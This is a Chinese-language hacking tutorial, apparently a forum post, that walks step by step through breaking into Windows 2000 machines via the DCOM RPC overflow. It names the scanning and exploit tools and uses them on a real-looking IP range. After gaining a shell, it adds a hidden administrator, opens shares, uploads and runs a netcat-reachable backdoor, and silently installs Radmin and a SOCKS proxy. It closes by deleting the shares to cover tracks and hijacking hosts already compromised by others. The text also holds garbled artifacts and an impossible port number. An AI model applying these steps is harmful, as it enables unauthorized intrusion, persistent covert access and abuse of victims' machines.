防禦辦法： 安裝rpc補丁 
使用防火牆過濾135，445，139等埠 
 RPC漏洞入侵併打造完美后門！ 
 現在網上很流行dcomrpc，哈哈，那好就說說利用dcomrpc入侵。和入侵之後做的事情  。

需要的工具： 
很好的：　radmin.exe  
掃描工具: retinarpcdcom.exe  
溢位攻擊工具:RpcDcom（通用溢位工具)  
指令碼開啟telnet工具：telnet.vbe opentelnet.exe resumetelnet.exe  
代理：sksockserver.exe  
後門程式：WinEggDropShellPro3thVersion

好了，該做的都做的差不多了。現在開始把~~

首先使用retinarpcdcom.exe掃描一個網段。查詢有rpc漏洞的機子，這個漏洞需要135埠開放，（想必  
 
隨便掃一下就會發現有許多主機開放的135埠）。。。。。。 

(人走運座著都能檢到錢) 211.217.50.xx　第一個主機就被掃出來又此漏洞。開始工作

看看211.217.50.xx有沒有其他的漏洞或是若口令之類的.我們可以使用流光掃描一下, 好了..看樣子沒有 
其他的缺陷,主機開了3389埠,我們可以上去看一下是xp版本還是win2k 

哈哈，是win2k server版本 

展開命令列：  
[檢視dcomrpc的用法　用法 dcomrpc -d <host> [options]　

F:/hack>cd rpc/dcomrpc 
RPC DCOM Expl01t coded by .:[oc192.us]:. Security  
Complied and Modified by Expl01t www.longker.com  
Usage:  
dcomrpc -d <host> [options]  
Options:  
　 -d:　　　　Hostname to attack [Required]  
　 -t:　　　　Type [Default: 0] 
　 -r:　　　　Return address [Default: Selected from target]  
　 -p:　　　　Attack port [Default: 135] 
　 -l:　　　　Bindshell port [Default: 666]  
Types:  
　 0 [0x0018759f]: [Win2k-Universal]  
　 1 [0x0100139d]: [WinXP-Universal] 
開始進行溢位： 
F:/hack>cd rpc/dcomrpc -d　211.217.50.xx 0  
X j,-vl  
RPC DCOM remote expl01t - .:[oc192.us]:. Security  
Complied and recorrected by Expl01t www.longker.com  
[+] Resolving host..  
[+] Done.  
[+] Expl01ting....Just wait...... 
等到出現，說明溢位成功  
c:/winnt/system32>  
 
接著我們建立使用者 
c:/winnt/system32>net user blueye$Content$nbsp;1111 /add 
命令成功完成。 
把使用者新增成超級管理員  
c:/winnt/system32>net localgroup administrators blueye$Content$nbsp;/add  
命令成功完成。 
看看共享開了沒有,沒有的話把共享開開  
c:/winnt/system32>net share  
清單是空的。   
c:/winnt/system32>net share ipc$Content$nbsp; 
命令成功完成。  
c:/winnt/system32>net share admin$Content$nbsp; 
命令成功完成。  
到這裡我們入侵告一段落 
[ 建 立 IPC$Content$nbsp;連 接 ，也可以使用tftp上傳 ，先和對方建立連線]  
F:/hack>net use //211.217.50.xx/ipc$Content$nbsp;"1111" /user:blueye$Content$nbsp; 
[ 上 傳 一 個 後 門 程 序 到 對 方 的 主 機 裡] 
F:/hack>copy d:/inject.exe //211.217.50.xx/admin$/system32  
F:/hack>copy d:/tback.dll //211.217.50.xx/admin$/system32  
然後執行後門程式，我們可以使用at命令。但是有的機器把at明令禁止了，建議直接開起telnet  
使用opentelnet.exe　 關閉開啟的telnet使用resumetelnet //ip user password  
如果忘記開共享可以使用指令碼開啟telnet來開共享，用法: 
cscript telnet.vbe ip user password null port　 (null是驗證方式)  
F:/hack>opentenet //211.217.50.xx blueye$Content$nbsp;1111 1 4567 
F:/hack>telnet 211.217.50.xx 4567 
 
連線並執行後門程式,執行後門程式命令　根目錄：inject.exe -run 
（後門使用方法和安裝都在zip檔案裡面包含了）  
後門埠123456  
F:/hack>nc 211.217.50.xx 123456 
　　　　　　　Welcome To WinEggDropShell Matrix Version 
[Melody]#  
  
下面安裝radmin 
配置好的radmin客戶端有4個檔案。配置radmin客戶端可參考相關文章  
radmin.reg  
raddrv.dll  
admdll.dll 
r_server.exe  
把這個4個檔案copy c:/winnt/system32 
在目錄下面執行命令  
c:/winnt/system32>r_server /s radmin.reg　 -----匯入登錄檔 
c:/winnt/system32>r_server /install /silence -----安裝radmin.並且不顯示托盤  
c:/winnt/system32>net start r_server　----- 啟動服務  
可以開啟3389的話你自己看著辦把，哈哈 
安裝sock代理  
把sksockserver.exe copy c:/winnt/system32  
c:/winnt/system32>sksockserver /install　　　　　　　　　-----安裝服務  
c:/winnt/system32>sksockserver -config port 1234　　　　　----埠定在1234　自己可以改  
c:/winnt/system32>sksockserver -config starttype 2　　　　----開機自動啟動  
c:/winnt/system32>net start skserver　　　　　　　　　　　 ----啟動服務  
最後刪除共享  
net share ipc$Content$nbsp;/del  
net share admin$Content$nbsp;/del 

的時候你發現有人已經安裝了。。怎麼辦？走人？--------NO  ?
看操作　 (我輸入的內容)  
後門連線 
F:/hack>nc 211.217.50.xx 123456 
c/"
　　　　　　　Welcome To WinEggDropShell Matrix Version  13mQvA?- 

[Melody]#（pslist） 
[Melody]#(pskill r_server)  
[Melody]#(shell) 
c:/winnt/system32>(del r_server.exe) 
c:/winnt/system32>(del admdll.dll)  
c:/winnt/system32>(del raddrv.dll)  
copy你自己的上去，然後安裝  
省事的辦法直接匯入登錄檔，然後重新輸入安裝命令執行，就可以了，只是在原來預設埠上面架上了密  
碼  
等等。。。。為什麼我輸入匯入登錄檔命令不管用呢？出現什麼regedit不是可執行的程式之類的 。  
完了，努力白費了。。。。。。。 -----------------------------NO 
出現這樣的情況最簡單的解決辦法telnet上去匯入試試看，什麼？不是把，有沒有搞錯阿。。 
呵呵，儘管放心，去試試看就知道；還可以先執行radmin 然後在radmin的dos下匯入，也是可以的。